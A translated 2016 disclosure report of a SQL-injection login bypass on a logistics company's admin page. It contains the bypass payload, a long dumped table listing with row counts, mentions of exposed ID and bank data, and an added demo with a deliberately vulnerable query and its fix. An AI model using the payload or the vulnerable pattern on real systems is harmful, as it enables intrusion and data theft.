
Vulnerability summary

Defect ID: wooyun-2016-0214718

Title: Backend login bypass / SQL injection in a 飞特物流 (Feite Logistics) system (tens of millions of user records / waybills / bank card numbers / ID card photos)

Vendor: 飞特物流

Author: 路人甲

Submitted: 2016-05-31 13:23

Fixed: 2016-07-17 18:20

Published: 2016-07-17 18:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-05-31: Details sent to the vendor; awaiting vendor handling
2016-06-02: Vendor confirmed; details disclosed to the vendor only
2016-06-12: Details disclosed to core white hats and relevant domain experts
2016-06-22: Details disclosed to regular white hats
2016-07-02: Details disclosed to intern white hats
2016-07-17: Details disclosed to the public

Brief description:

Backend login bypass / SQL injection

Detailed description:

http://**.**.**.**/manage/admin.aspx
Entering admin' as the username produces a database error

QQ截图20160531100621.png


The login can be bypassed (using an older version of IE, such as IE6)
Username:

admin' or 1=1 --


Password: anything

QQ截图20160531100708.png


QQ截图20160531100806.png


Proof of vulnerability:

The same login form is also SQL-injectable
13 databases

QQ截图20160531100357.png


QQ截图20160531101155.png


430 tables

QQ截图20160531101321.png


Tens of millions of rows

QQ截图20160531100030.png


QQ截图20160531101446.png


QQ截图20160531101726.png


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
SELECT a.name, b.rows FROM sysobjects AS a INNER JOIN sysindexes AS b ON a.id = b.id WHERE (a.type = 'u') AND (b.indid IN (0, 1)) ORDER BY b.rows DESC [407]:
[*] SmtErrorLog, 59062443
[*] MoneyRecord, 39373205
[*] orderDetail, 59062447
[*] haikwanDetail, 34760162
[*] orderParent, 39373211
[*] haikwanParent, 39373280
[*] orderDetailHistory, 39373340
[*] TotalAllImport, 39373451
[*] ReProductPriceRecord, 39373599
[*] ExpressImport, 39373754
[*] ReOrderDeliveryRecord, 39373865
[*] SenderByOrder, 39374318
[*] PostTracesAreaBySpecialType, 39374460
[*] FlytReceiveVolume, 39374559
[*] goodsDetail, 39374676
[*] ReceiveDetail, 39374790
[*] TrackParentOrders, 39374932
[*] OrderHistory, 59062498
[*] OrderPerformanceUser, 39375129
[*] TB_MailFilterList, 39375249
[*] TransitLableListItem, 39375375
[*] FlytLabelPrintHistory, 59062507
[*] OrderSource, 39375561
[*] OrderToTransactionRate, 39375633
[*] OrderToOSOrder, 59062515
[*] T_TestJJ, 39375753
[*] OrderRemark, 39375829
[*] OrderJJOverweight, 39375903
[*] OrderQuantity, 59062525
[*] FlytReceiveTemp, 39376037
[*] RelatePPLToREPORTS, 39376119
[*] OrderListItemType, 39376161
[*] PickTempRecordDetail, 39376205
[*] ReportEubUpWebTime, 39376269
[*] OrderJJTemp_Bak, 39376324
[*] ModifyPostTypeOrders, 39376401
[*] ContactCustomerProgress, 36143082
[*] QualityInspectionItem, 36143090
[*] BatchTransitLableListItem, 36143094
[*] BillReceive, 34760292
[*] ActivitySource, 34760295
[*] customSet, 30097463
[*] OrderCoupon, 59062554
[*] OrderSplitfactor, 36143104
[*] FreightLog, 36143105
[*] CreateTableID, 59062558
[*] FGMSRecordInfo, 36143109
[*] CreateBarCodeToUser, 30097479
[*] Smt_Lin_OrderID, 59062565
[*] ExpTrack, 31516705
[*] goodsParent, 36143119
[*] customSet_20140730, 34760317
[*] ERPCustomCode, 59062575
[*] OrderUsePoints, 59062578
[*] GoodsTransferDetail, 59062580
[*] ChangeTraceOrder, 36143128
[*] QualityInspection, 36143133
[*] TransitNos, 36143136
[*] CarTransportTimeout, 59062587
[*] TransitLableList, 36143141
[*] ReturnOrderListItem, 59062593
[*] OrderBackFreight, 36143146
[*] UPS_DHL_Remote_Area, 30097493
[*] MoneyDelRecord, 59062601
[*] OrderDeceiveLevel, 34760324
[*] BatchTransitLableList, 28624602
[*] CustomerDebtAlertHistory, 28624607
[*] OrdersPrintNumber, 29749202
[*] Outorder, 28624622
[*] UpWebTimeByTraceID, 59062621
[*] BatchPostyPKGDetail, 59062623
[*] BatchPostyDetail, 34760339
[*] BagListItem, 36143175
[*] TwiceReceiptGoods, 59062631
[*] userInfoHistory, 28624653
[*] PostTracesByType, 34760344
[*] FlytSecondaryReceivingInfo, 34760351
[*] PickTempRecordParent, 34760353
[*] VolumeWeightRecord, 31516769
[*] ProfitMarginReport, 36143200
[*] PostCounter_ProductFeature, 31516774
[*] T_WT_ManageLog, 36143206
[*] OrderMatchHistory, 36143209
[*] OrderAuditLog, 59062651
[*] TransportSingleDetail, 34760364
[*] TrackingForCN, 34760366
[*] TrackOrderInfo, 34760369
[*] OrderAutoSplitLog, 34760367
[*] LosingAccountHistory, 36143224
[*] LosingAccount, 34760386
[*] FlytFees, 31516803
[*] MoneyInitializeRecord, 34760385
[*] XMLFileContent, 59062660
[*] eLogisticsOperateHistory, 36143233
[*] SeaRailTransSitDetail, 34760402
[*] Exchange_rateHistory, 59062664
[*] RecordMatchPostType, 36143238
[*] T_TrackOrdersLog, 7112250
[*] FlytUserMailSend, 59062673
[*] MultipleConditionOfPostType, 30097588
[*] TransportSingle, 34760417
[*] postTypeParent, 36143253
[*] userInfo, 36143258
[*] MoneyRecordTime, 7112344
[*] T_WT_Manage, 36143261
[*] CustomsBasedInformation, 34760429
[*] Lostpkg_History, 7112378
[*] OrderBlack, 39376378
[*] RechargePrintRecord, 7112394
[*] userInfo_bak20140926, 34760435
[*] OrderTrackHistory, 7112421
[*] userInfo_bak20140925, 7112431
[*] OrderJJTemp, 34760440
[*] OrderStatusSync, 59062715
[*] ProcessCenterSet, 7112463
[*] UserInfoTrack, 36143287
[*] CustomsClearanceFee, 36143291
[*] Charge, 36143295
[*] ReturnOrderList, 7112519
[*] NoPostal, 59062733
[*] OrderError, 39376409
[*] BatchProcessing, 39376445
[*] OrderToServiceMailSend, 59062738
[*] OrderRecordByPMC, 39376556
[*] tmp_deal_orderData20150922, 39376592
[*] tmp_deal_orderData20150922, 39376628
[*] ChargeByCountry, 39376667
[*] PkgToHongkongUnDelivered, 39376709
[*] Receive_TraceID, 59062751
[*] BatchPosty, 39376745
[*] Lostpkg_Apply, 39376766
[*] PostTypeOptionSortCode, 39376787
[*] InfringementManage, 59062760
[*] FlytZoneByCountry, 39376847
[*] FlytPostZone, 39376874
[*] ShipmentErrorOrder, 59062767
[*] FlytPostRoundingByWeight, 39376919
[*] PostTypeOperatHistory, 39376946
[*] WMSBatchNo, 39376970
[*] FreightSettingLog, 39377000
[*] T_FreiPostOrderBatchNum, 39377021
[*] conditionOfPostType, 36143325
[*] MoneyResetRecord, 39377075
[*] T_GoodsQuestionLog, 59062786
[*] T_ChinaPostSenderInfo, 39377102
[*] OUBShipmentData, 39377120
[*] HKEms_charge, 39377138
[*] PostLimited_RelatedProductLable, 39377162
[*] PostTypeInProcessCenter, 39377195
[*] TransitLableListRelatived, 39377234
[*] BadAccount, 39377255
[*] Temp_RegUserSendMailList, 39377282
[*] SenderInformation, 39377309
[*] QuestionVerify, 39377333
[*] ResponsibilityEvents, 39377360
[*] ErpAutoCheckOrder, 39377382
[*] SMTAccount, 34760577
[*] CMS_News, 36143374
[*] T_FDS_WS_SyncLog, 7113615
[*] T_WT_History, 7113626
[*] CountryByPostType, 34760597
[*] Customerhistory, 59063095
[*] FeesDiscount, 59063118
[*] T_ReturnOrderScanRemarks, 28625563
[*] FlytPostTypeSpecialCost, 59063161
[*] OrderLogisticsFreight, 59063183
[*] PostAndRegeistCharge, 59063201
[*] Charge_Other, 59063219
[*] PostTypeCountryOption, 59063236
[*] tablespaceinfo, 59063247
[*] T_GoodsQuestionManagement, 34760820
[*] PostType_MailTypeByGroup, 59063278
[*] TrackCarrier, 59063289
[*] Usps_labelArea, 59063303
[*] postType, 7116992
[*] CountrySortingNo, 59063320
[*] ConfirmedTag, 59063328
[*] OperHistory, 59063335
[*] countrys, 59063347
[*] NationalRegionCountry, 59063358
[*] PostTypeOptions, 59063368
[*] DataCountryCode, 59063380
[*] OutboundCountryToZone, 31517189
[*] UserAmazonAccount, 39377366
[*] CountryHKAPVolumeMark, 28625954
[*] ReturnMoneryApply, 36143637
[*] T_FreipostCountrys, 59063439
[*] TrackCountry, 36143644
[*] CountrySgEmsSortingNo, 59063463
[*] PostTypeToTrackCarrier, 39377387
[*] PostTypeToTrackCarrier, 59063491
[*] SeaRailTransSit, 39377528
[*] PremiumPriceInProcessCenter, 59063503
[*] FlytSubmitProcessCenter, 39377692
[*] PayPalAdvance, 39377810
[*] ImpExcel, 59063530
[*] ImpExcel, 59063537
[*] ImpExcel, 59063542
[*] GoodsTransfer, 59063549
[*] Printshippingaddressconfig, 59063557
[*] FgmsPrint, 59063565
[*] FgmsPrint, 39378392
[*] csv58039, 59063579
[*] OrderParentExtend, 59063587
[*] csv57880, 59063595
[*] Cost_Charge, 59063601
[*] PerformanceOfTypeDetail, 39378773
[*] ExpressSetting, 39378881
[*] EAExpense, 59063629
[*] csv57822, 39379103
[*] DownLoadHistory, 59063651
[*] OrderErrorCode, 59063661
[*] csv58460, 59063671
[*] csv18981, 39379421
[*] CustomerRankParameter, 39379502
[*] BankAccount, 59063694
[*] BankAccount, 59063704
[*] FlytSetPostVolume, 59063709
[*] FlytSetPostVolume, 59063721
[*] relationOfUserGroup, 39379862
[*] ImTrace, 59063740
[*] HuijiangCNAMGZSenderInfo, 59063747
[*] GroupRelateSeller, 59063760
[*] GroupRelateSeller, 39380213
[*] deliverAddress, 39380292
[*] DeliverBank, 59063791
[*] DeliverBank, 39380460
[*] EADepartment, 59063802
[*] ReturnImport, 36143763
[*] TraceIdQueryCondition, 31517326
[*] EfficiencyReport, 36143769
[*] DGMESCharge, 34760995
[*] usermenu, 28626138
[*] csv70327, 59063859
[*] csv70327, 31517348
[*] Exchange_rate, 36143794
[*] Exchange_rate, 59063880
[*] HKDHLPartTable, 59063892
[*] CustomerParameter, 59063905
[*] ApiSignPlatform, 59063915
[*] ApiSignPlatform, 28626174
[*] ChinaPostPartTable, 59063935
[*] ChinaPostPartTable, 30098161
[*] ChinaPostPartTable, 59063954
[*] ChinaPostPartTableSH, 59063962
[*] csv58365, 34761055
[*] PostTypeInProcessLog, 36143875
[*] DeliverAddressToProcessCenter, 59063987
[*] EAReimburseHistory, 59064001
[*] ChannelNumberMapPostType, 59064007
[*] CrossPostProblemOrder, 59064014
[*] CrossPostProblemOrder, 59064023
[*] CrossPostProblemOrder, 59064034
[*] CrossPostProblemOrder, 59064044
[*] EAReimburseAudit, 59064052
[*] EAReimburseDetail, 59064058
[*] BlackListPay, 36143908
[*] BlackListPay, 59064076
[*] csv19626, 59064086
[*] csv19626, 36143933
[*] MoneyAudit, 36143942
[*] SystemConfig, 34761113
[*] csv20453, 59064135
[*] csv20453, 59064144
[*] EAReimburse, 59064154
[*] EAReimburse, 59064167
[*] GlobalExpressRecord, 59064179
[*] GlobalExpressRecord, 59064191
[*] DHLPartTable, 36143997
[*] GZEMSPartTable, 36144004
[*] MailTypeByGroup, 36144009
[*] PostTypeToStorage, 59064223
[*] OutboundTraceIdFormat, 36144033
[*] OutboundTraceIdFormat, 36144036
[*] PostTypeByGroup, 59064239
[*] ChannelScanHistory, 59064250
[*] ChannelScanHistory, 36144051
[*] EABankAccount, 59064266
[*] ChannelScanListItem, 36144060
[*] ChannelScanListItem, 59064285
[*] ChannelScanListItem, 28626297
[*] ChannelScanListItem, 34761233
[*] ChannelScanListItem, 59064308
[*] NationalRegion, 59064319
[*] csv20531, 59064325
[*] csv21877, 59064330
[*] csv70402, 36144088
[*] csv70402, 59064352
[*] customerRank, 59064362
[*] CustomServiceRecord, 36144108
[*] images, 36144115
[*] images, 36144120
[*] images, 59064388
[*] ChannelScanList, 59064397
[*] EubApiRequester, 59064408
[*] EubApiRequester, 36144133
[*] EubApiRequester, 59064422
[*] EubApiRequester, 59064429
[*] EubApiRequester, 59064440
[*] PerformanceOfType, 59064444
[*] CMS_tbLink, 59064448
[*] CMS_tbLink, 59064455
[*] CMS_tbLink, 59064461
[*] CMS_tbLink, 36144185
[*] CMS_tbLink, 36144190
[*] CMS_tbLink, 59064485
[*] csv17186, 36144202
[*] T_InformationCollectionLibrary, 59064494
[*] ChannelChargeSetting, 59064504
[*] ChannelChargeSetting, 36144220
[*] ChannelChargeSetting, 59064513
[*] ChannelChargeSetting, 36144235
[*] ChannelChargeSetting, 59064525
[*] ChannelChargeSetting, 36144241
[*] csv21199, 59064536
[*] csv21199, 59064544
[*] csv21199, 59064553
[*] csv21199, 34761367
[*] csv70018, 59064572
[*] csv70018, 36144279
[*] csv70221, 59064590
[*] csv70221, 59064601
[*] SetFlytUserToPostTypeWhiteList, 59064611
[*] BlacklistUsers, 59064617
[*] BlacklistUsers, 36144308
[*] BlacklistUsers, 59064632
[*] BlacklistUsers, 59064638
[*] BlacklistUsers, 36144320
[*] BlacklistUsers, 36144334
[*] BlacklistUsers, 7122255
[*] BlacklistUsers, 59064694
[*] BlacklistUsers, 36144346
[*] BlacklistUsers, 39380511
[*] BlacklistUsers, 39380547
[*] BlacklistUsers, 39380595
[*] BlacklistUsers, 59064735
[*] BlacklistUsers, 59064745
[*] BlacklistUsers, 39380819
[*] BlacklistUsers, 39380880
[*] BlacklistUsers, 59064776
[*] BlacklistUsers, 59064785
[*] BlacklistUsers, 39381030
[*] BlacklistUsers, 39381068
[*] BlacklistUsers, 59064803
[*] BlacklistUsers, 39381156
[*] BlacklistUsers, 59064821
[*] BlacklistUsers, 59064833
[*] BlacklistUsers, 39381243
[*] BlacklistUsers, 39381276
[*] BlacklistUsers, 59064858
[*] BlacklistUsers, 39381325
[*] BlacklistUsers, 36144499
[*] BlacklistUsers, 59064881
[*] CMS_NewMenu, 39381393
[*] CMS_NewMenu, 59064898
[*] CMS_NewMenu, 36144531
[*] CMS_NewMenu, 39381462
[*] CMS_NewMenu, 39381480
[*] CMS_NewMenu, 59064923
[*] CMS_NewMenu, 39381519
[*] CMS_NewMenu, 39381549
[*] CMS_NewMenu, 39381575
[*] CMS_NewMenu, 39381600
[*] CMS_NewMenu, 59064950
[*] CMS_NewMenu, 39381636
[*] CMS_NewMenu, 59064965
[*] CMS_NewMenu, 7123442
[*] CMS_NewMenu, 31517982
[*] CMS_NewMenu, 59064988
[*] CMS_NewMenu, 36144597
[*] CMS_NewMenu, 59065002
[*] CMS_NewMenu, 59065008
[*] CMS_NewMenu, 34761585
[*] CMS_NewMenu, 31517996
[*] CMS_NewMenu, 36144639
[*] CMS_NewMenu, 36144666
[*] CMS_NewMenu, 59065109
[*] CMS_NewMenu, 59065112
[*] CMS_NewMenu, 31518049
[*] CMS_NewMenu, 59065124
[*] CMS_NewMenu, 36144688
[*] CMS_NewMenu, 59065143
[*] CMS_NewMenu, 59065152
[*] CMS_NewMenu, 59065159
[*] CMS_NewMenu, 36144702
[*] csv10370, 34761622
[*] csv10370, 36144707
[*] csv10370, 34761626
[*] csv10370, 59065196
[*] csv10370, 59065203
[*] csv10370, 59065212
[*] csv10370, 59065218
[*] csv10370, 34761637
[*] csv10370, 59065234
[*] csv10370, 59065242
[*] csv10370, 7123780
[*] csv10422, 59065258
[*] csv13030, 36144746
[*] csv13030, 36144753
[*] csv13030, 36144762
[*] csv13030, 59065292
[*] csv13030, 36144785
[*] csv13030, 36144794
[*] csv13030, 59065315
[*] csv13030, 59065321


QQ截图20160531102928.png


QQ截图20160531103041.png


QQ截图20160531103338.png


A large number of ID card images

QQ截图20160531104038.png


One field in these records stores the user's ID card photo

QQ截图20160531104303.png


QQ截图20160531104345.png


UserAmazonAccount

QQ截图20160531105250.png

Fix recommendation:

Use parameterized queries; the login logic of the login page also has to be changed
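To make the fix concrete, the following is an added example (not code from the original report or from the vendor's system): the same login check written first by string concatenation, which is the pattern the report's observations point to, and then with bound parameters. Python and an in-memory SQLite database stand in for the ASP.NET / SQL Server stack named in the report; the users table, its rows and the credentials are constructed for the demonstration, and the assumption that the login query compares a plaintext password column is the example's, not the report's.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Login check built by concatenating user input into the SQL text.

    This is the 'before' state: a quote in the username becomes SQL syntax, so
    admin' breaks the statement (the error the report observed) and
    admin' or 1=1 -- turns the WHERE clause into an always-true condition and
    comments out the password check, returning the first row in the table.
    """
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Same check with bound parameters: the input is sent as a value, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def concatenation_raises(conn: sqlite3.Connection, username: str) -> bool:
    """True if the concatenated query fails to parse for this username (the admin' symptom)."""
    try:
        login_vulnerable(conn, username, "x")
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 --"  # the bypass string quoted in the report
    print("concatenated, admin' raises an error:", concatenation_raises(db, "admin'"))
    print("concatenated, bypass string logs in as:", login_vulnerable(db, payload, "anything"))
    print("parameterized, bypass string logs in as:", login_parameterized(db, payload, "anything"))
    print("parameterized, real credentials log in as:", login_parameterized(db, "admin", "S3cret!"))
```

Binding the parameters is what closes the injection; it does not by itself fix the second half of the recommendation, the login logic. A login check that compares a stored plaintext password, as the example's table does, should be replaced by a comparison against a salted password hash, and the login decision should depend on a single matched account rather than on whether any row came back.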

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2016-06-02 18:13

Vendor reply:

CNVD has confirmed and reproduced the described situation, and has notified the website operator by email through its publicly listed contact channel; the operator will provide a remediation plan.

Latest status:

None yet